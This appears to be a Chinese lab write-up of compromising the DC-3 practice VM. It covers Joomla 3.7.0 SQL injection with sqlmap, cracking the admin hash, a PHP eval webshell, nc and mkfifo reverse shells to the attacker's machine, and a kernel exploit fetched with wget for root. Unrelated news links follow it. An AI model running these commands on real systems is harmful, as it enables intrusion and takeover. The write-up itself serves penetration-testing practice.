DC-3靶机渗透测试
先对内网进行探活扫描nmap -sn 192.168.207.0/24dc-3的ip是192.168.207.131进行端口扫描nmap -sV -p- 192.168.207.131开放了http服务上浏览器访问http://192.168.207.131查看一下网站内容有一个登录框没有验证码可以尝试弱口令使用的是Joomla框架进行目录扫描dirsearch -u http://192.168.207.131扫到一个管理员登录页面我们对框架进行版本扫描joomscan是针对joomla的扫描器joomscan --url http://192.168.207.131Joomla 3.7.0searchsploit Joomla 3.7.0存在sql注入searchsploit -m 42033.txtcat 42033.txt这里让我们用sqlmap并给出相应语句sqlmap -u http://192.168.207.131/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering]查joomladb中的表sqlmap -u http://192.168.207.131/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 -p list[fullordering] -D joomladb --tables查#__users表里的字段sqlmap -u http://192.168.207.131/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 -p list[fullordering] -D joomladb -T #__users --columns这里的#__users要用双引号框起来不然会报错第一个填y第二个填y第三个随便填第四个填10获取字段username和passwordsqlmap -u http://192.168.207.131/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 -p list[fullordering] -D joomladb -T #__users -C username,password –dump得到admin和密码哈希将哈希存入txt中让john去跑一下echo $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu 666.txtjohn 666.txt得到密码snoopy,登录网页后台选择ExtensionsTemplatesTemplates选择Beez3 Details and Files选择new file点击左边的html选择php创建文件上传一句话木马?php eval($_POST[Z]);?上传保存访问上传的路径http://192.168.207.131/templates/beez3/html/使用蚁剑远程连接终端接下来反弹shell到kali里在kali里输入nc -lvvp 6666开启监听在蚁剑里输入nc 192.168.207.128 6666 -e /bin/bash页面显示-e不可用那么使用rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.207.128 6666 /tmp/f是利用 nc FIFO 管道实现的反弹Shell写法常用于没有 nc -e 参数时rm /tmp/f删除 /tmp/f因为后面要创建一个新的 FIFO 文件把旧的数据删掉mkfifo /tmp/f创建命名管道cat /tmp/f不断读取 /tmp/f 里面的数据| /bin/sh交给 shell 执行-i交互模式让 shell 像正常终端一样工作21把错误输出也发送出去python -c import pty;pty.spawn(/bin/bash)查看系统版本cat /etc/os-release是Ubuntu 16.04searchsploit Ubuntu 16.04选择Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() b | linux/local/39772.txtsearchsploit -m linux/local/39772.txtcat 39772.txtwget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip开启http服务上传39772.zippython3 -m http.server 80到dc-3的终端上​wget http://192.168.207.128/39772.zipunzip 39772.zipcd 39772tar -xvf exploit.tarcd ebpf_mapfd_doubleput_exploit./compile.sh./doubleputwhoami成功获得root权限cd ~lscat the-flag.txt渗透测试成功

相关新闻

NumPy结构化数组:高效处理混合类型数据的底层利器

NumPy结构化数组:高效处理混合类型数据的底层利器

1. 从“一维表格”到“多维表格”:为什么需要结构化数组?如果你用过Pandas的DataFrame,或者处理过数据库查询结果,那你对“结构化数据”这个概念应该不陌生。简单说,它就是把不同类型的数据(比如字符串、整…

2026/7/29 8:28:59 阅读更多 →
虚谷号U盘模式详解:原理、启用方法与文件操作指南

虚谷号U盘模式详解:原理、启用方法与文件操作指南

1. 项目概述:为什么U盘模式是虚谷号入门的“第一把钥匙” 拿到一块虚谷号开发板,很多朋友的第一反应可能是赶紧接上电脑,打开编程软件,准备大展身手。但如果你直接这么干,大概率会碰壁——电脑可能根本不认识这个新设备…

2026/7/29 8:27:59 阅读更多 →
工程伦理习题解析:从理论到实践,掌握伦理决策框架

工程伦理习题解析:从理论到实践,掌握伦理决策框架

1. 项目概述:一份课后习题答案的诞生与价值最近在整理资料时,翻出了之前学习《工程伦理》(李正风主编)这门课程时,自己整理的一份课后习题参考答案,涵盖了第1到第5章以及第10章的内容。这门课对于工科背景的…

2026/7/29 8:27:59 阅读更多 →

最新新闻

从零构建履带式移动机器人:STM32与树莓派双核架构实战

从零构建履带式移动机器人:STM32与树莓派双核架构实战

1. 项目概述:从零打造一台智能“侦察兵” 几年前,我第一次尝试用树莓派和几个舵机拼凑出一个能跑的小车,结果在客厅地毯上就卡住了。那次经历让我深刻意识到,一个真正“能用”的移动机器人平台,其核心不在于代码有多复…

2026/7/29 8:41:02 阅读更多 →
如何彻底解决磁盘空间不足问题:WinDirStat完全使用指南

如何彻底解决磁盘空间不足问题:WinDirStat完全使用指南

如何彻底解决磁盘空间不足问题:WinDirStat完全使用指南 【免费下载链接】windirstat WinDirStat is a disk usage statistics viewer and cleanup tool for Microsoft Windows 项目地址: https://gitcode.com/gh_mirrors/wi/windirstat 本文将探讨Windows用户…

2026/7/29 8:41:02 阅读更多 →
公开课资料高效使用指南:从环境配置到代码复现的完整流程

公开课资料高效使用指南:从环境配置到代码复现的完整流程

这类公开课资料合集最值得先看的不是它有多少文件,而是能不能快速找到你需要的那部分内容、有没有配套的代码或数据、以及适不适合你的学习阶段。 我一般会先看合集的目录结构、文件命名规则和配套说明。如果只是把一堆视频、PPT、代码打包扔出来,没有清…

2026/7/29 8:41:02 阅读更多 →
终极Nintendo Switch游戏文件管理神器:NSC_BUILDER让你的游戏库井井有条

终极Nintendo Switch游戏文件管理神器:NSC_BUILDER让你的游戏库井井有条

终极Nintendo Switch游戏文件管理神器:NSC_BUILDER让你的游戏库井井有条 【免费下载链接】NSC_BUILDER Nintendo Switch Cleaner and Builder. A batchfile, python and html script based in hacbuild and Nuts python libraries. Designed initially to erase tit…

2026/7/29 8:41:02 阅读更多 →
如何用GTA5线上小助手快速提升游戏体验:面向新手的完整指南

如何用GTA5线上小助手快速提升游戏体验:面向新手的完整指南

如何用GTA5线上小助手快速提升游戏体验:面向新手的完整指南 【免费下载链接】GTA5OnlineTools GTA5线上小助手 项目地址: https://gitcode.com/gh_mirrors/gt/GTA5OnlineTools 还在为GTA5线上模式的重复任务感到乏味吗?想要探索更多隐藏玩法却不知…

2026/7/29 8:41:02 阅读更多 →
太空居住系统设计:从生命支持到月球基地的工程实践

太空居住系统设计:从生命支持到月球基地的工程实践

1. 项目概述:从科幻到现实的居住革命 “太空中的房子”,听起来像是科幻电影里的场景,比如《星际穿越》里旋转的永恒号,或者《流浪地球》里那个带着地球跑路的行星发动机地下城。但今天我们要聊的,可不是电影特效&#…

2026/7/29 8:40:02 阅读更多 →

日新闻

【RT-DETR多模态创新改进】CVPR 2025 | 独家特征融合创新改进篇 | 引入RLAB残差线性注意力模块,有效融合并强调多尺度特征,多种改进点,适合红外与可见光融合目标检测任务,有效涨点

【RT-DETR多模态创新改进】CVPR 2025 | 独家特征融合创新改进篇 | 引入RLAB残差线性注意力模块,有效融合并强调多尺度特征,多种改进点,适合红外与可见光融合目标检测任务,有效涨点

一、本文介绍 🔥本文在RT-DETR多模态融合目标检测中引入RLAB残差线性注意力模块,可在不同模态特征交互阶段进行多次残差细化,使可见光、红外等特征在尺度、语义和空间位置上更好对齐;随后将细化特征与解码器输出拼接并生成Q、K、V,通过线性注意力自适应强化关键通道、目…

2026/7/29 0:00:23 阅读更多 →
AI编程系列02:合并知识功能,给 AI 问数和 RAG 场景打基础

AI编程系列02:合并知识功能,给 AI 问数和 RAG 场景打基础

AI编程系列02:合并知识功能,给 AI 问数和 RAG 场景打基础 在上一期「AI编程系列」中,我们学习了如何构建一个基础的 AI 问答系统,通过简单的输入输出让模型回应问题。但现实世界中的 AI 应用往往需要处理更复杂的场景:…

2026/7/29 0:00:23 阅读更多 →
AI智能体开发实战:从工具调用到企业级部署

AI智能体开发实战:从工具调用到企业级部署

1. 从被动问答到主动执行:AI Agent的范式转变过去两年,大语言模型最显著的应用形态是聊天机器人——用户提问,AI回答。但真正的生产力革命发生在2023年下半年:当AI学会主动调用工具完成任务时,生产力工具的历史被彻底改…

2026/7/29 0:00:23 阅读更多 →

周新闻

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 数据集6000张 完整源码已标注数据集训练好的模型环境配置教程程序运行说明文档,可以直接使用!系统支持图片、视频、摄像头等多种方式检测裂缝,功能强大实用。 1数据集6000张 8各类别

2026/7/28 12:04:22 阅读更多 →
深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

pubg数据集 精选原图1.42万数据 1.49万标签 无任何重复、算法增强或冗余图像! pubg绝地求生目标检测数据集 1分类:e_body,14905个标签,txt格式 共计14244张图,99%为640*640尺寸图像 适合yolo目标检测、AI训练关键词&am…

2026/7/28 8:29:16 阅读更多 →
Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex检测数据集数据集详情检测类别: allies enemy tag图片总量:7247张训练集:5139张验证集:1425张测试集:683张标注状态:全部已标注,即拿即用数据格式:支持YOLO格式及其他格式&#…

2026/7/28 5:03:42 阅读更多 →

月新闻